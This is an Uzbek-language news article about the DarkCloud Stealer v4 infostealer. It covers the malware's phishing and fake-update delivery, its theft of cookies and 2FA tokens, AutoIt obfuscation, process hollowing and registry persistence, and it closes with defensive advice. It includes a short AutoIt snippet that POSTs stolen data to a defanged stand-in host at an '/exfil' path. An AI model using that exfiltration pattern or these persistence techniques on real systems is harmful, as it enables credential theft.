2025-yilning mart oyidan beri Osiyo va Yevropadagi moliya institutlari, sog‘liqni saqlash tashkilotlari hamda elektron tijorat platformalarini nishonga olayotgan DarkCloud Stealer zararli dasturining yangi – to‘rtinchi versiyasi (v4) aniqlandi. Mazkur zararli dastur o‘z faoliyatida AutoIt deb nomlangan skriptlash tilidan foydalanadi. Bu esa unga an’anaviy xavfsizlik vositalarini chetlab o‘tish va tizimlardan maxfiy ma’lumotlarni o‘g‘irlash imkonini beradi.

DarkCloud v4’ni o‘rganayotgan Palo Alto Networks kompaniyasining Unit 42 tahdid razvedkasi guruhi ma’lumotlariga ko‘ra, bu zararli dastur AutoIt tilining moslashuvchan imkoniyatlaridan foydalanib, o‘z kodini mustaqil ishlaydigan fayllarga (executables) kompilyatsiya qiladi. Bu fayllar esa o‘zini qonuniy dasturlar kabi tutadi, bu orqali zararli kod tahlil tizimlari va “sandbox” muhitlarida aniqlanmaydi.

DarkCloud v4 odatda quyidagi yo‘llar orqali tizimga kiradi:

• Faktura xabarnomalari ko‘rinishidagi fishing xatlari,
• Yolg‘on reklama havolalari orqali yo‘naltirishlar,
• Zoom yoki Slack kabi mashhur dasturlar uchun soxta yangilanishlar.

Zararli dastur ishga tushgach, brauzer keshidagi cookie fayllar, avtomatik to‘ldirish ma’lumotlari, hatto ikkilamchi autentifikatsiya (2FA) tokenlarini yig‘adi. So‘ngra bu ma’lumotlar shifrlangan HTTPS kanal orqali hujumchilarga tegishli serverlarga uzatiladi.

Palo Alto Networks’ning hisob-kitoblariga ko‘ra, DarkCloud v4 bilan bog‘liq hodisalar 120 mingdan ortiq foydalanuvchi va tashkilot akkauntlarining buzilishiga olib kelgan. O‘g‘irlangan login-parollar “darknet” bozorlarida sotilmoqda.

DarkCloud v4’ning eng xavfli jihatlaridan biri — u AutoIt orqali ishlaydigan skriptni to‘g‘ridan-to‘g‘ri tizim xotirasida bajaradi. Misol uchun, quyidagi kod parchasi AutoIt interpreteri orqali HTTP so‘rov yuborishni ko‘rsatadi:

#include

$hSession = _WinHttpOpen()
$hConnect = _WinHttpConnect($hSession, "malware[.]cc")
$hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil", …, $sData)

Kodlar Base64 va XOR orqali shifrlangan bo‘lib, ularni tahlil qilish juda qiyin. Shuningdek, zararli fayl tarkibida “junk code” deb ataluvchi keraksiz kodlar bo‘ladi — bu esa statik tahlilni yanada murakkablashtiradi.

Zararli dastur explorer.exe yoki svchost.exe kabi qonuniy jarayonlarga o‘zini “inject” qiladi. Bu uslub process hollowing deb ataladi: dastlab qonuniy jarayon to‘xtatiladi, so‘ng uning xotirasiga zararli kod joylanadi va yana ishga tushiriladi.

Shuningdek, doimiylikni ta’minlash maqsadida Windows’ning reyestr fayllariga yozuvlar (masalan, HKCU\Software\Microsoft\Windows\CurrentVersion\Run) kiritiladi yoki “Scheduled Task” yaratiladi.

Mutaxassislar tashkilotlarga quyidagi choralarni ko‘rishni tavsiya etmoqda:

• AutoIt bilan bog‘liq g‘ayrioddiy jarayonlarni kuzatish,
• Tizimda shubhali .a3x fayllari yoki ishonchli ilovalardan boshlangan g‘alati skriptlarni aniqlash,
• Process injection, ya’ni bir jarayon ichiga boshqa kod kiritilishini kuzatib borish,
• Ilovalar ruxsat ro‘yxati (application allowlisting) orqali faqat ishonchli dasturlarni ishga tushirishga ruxsat berish,
• Tarmoqni segmentatsiya qilish orqali zararli dastur tarqalishini cheklash.

Eng muhimi, foydalanuvchilarni ijtimoiy muhandislik xurujlariga (phishing) qarshi ogoh bo‘lishga o‘rgatish lozim. Chunki aynan ushbu turdagi hujumlar DarkCloud v4’ning asosiy kirish nuqtasini tashkil qiladi.